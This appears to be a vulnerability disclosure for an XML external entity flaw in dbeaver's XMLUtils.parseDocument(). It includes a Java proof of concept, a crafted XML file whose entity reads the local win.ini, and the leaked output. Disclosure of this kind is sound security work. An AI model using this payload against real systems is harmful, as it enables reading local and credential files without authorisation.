CVE-2021-3836: Improper Restriction of XML External Entity Reference in dbeaver

dbeaver is vulnerable to Improper Restriction of XML External Entity Reference


✍️ Description

dbeaver is vulnerable to XML External Entity (XXE) injection. An attacker who can supply a crafted XML file as input to the parseDocument() function in “XMLUtils.java” can have the parser resolve external entities, which includes exposing the contents of local files to a remote server.

🕵️‍♂️ Proof of Concept

package xxe_poc;
import java.io.File;
import org.jkiss.utils.xml.XMLException;
import org.jkiss.utils.xml.XMLUtils;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;

public class Poc {

    public static void main(String[] args) {
        File file = new File("C:\\Users\\[user]\\eclipse-workspace\\xxe_poc\\src\\main\\resources\\sample.xml");
        Document doc;
        try {
            doc = XMLUtils.parseDocument(file);
            doc.getDocumentElement().normalize();
            NodeList nodeList = doc.getElementsByTagName("userInfo");
            for (int itr = 0; itr < nodeList.getLength(); itr++) {
                Node node = nodeList.item(itr);
                System.out.println("\nNode Name :" + node.getNodeName());
                if (node.getNodeType() == Node.ELEMENT_NODE) {
                    Element eElement = (Element) node;
                    System.out.println(
                            "Last Name: " + eElement.getElementsByTagName("lastName").item(0).getTextContent());
                }
            }
        } catch (XMLException e) {
            // TODO Auto-generated catch block
            e.printStackTrace();
        }

    }
}

sample.xml

<?xml version="1.0" ?>
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///c:/windows/win.ini"> ]>
<userInfo>
 <firstName>John</firstName>
 <lastName>&ent;</lastName>
</userInfo>

Check the Output:

Node Name :userInfo
Last Name: ; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
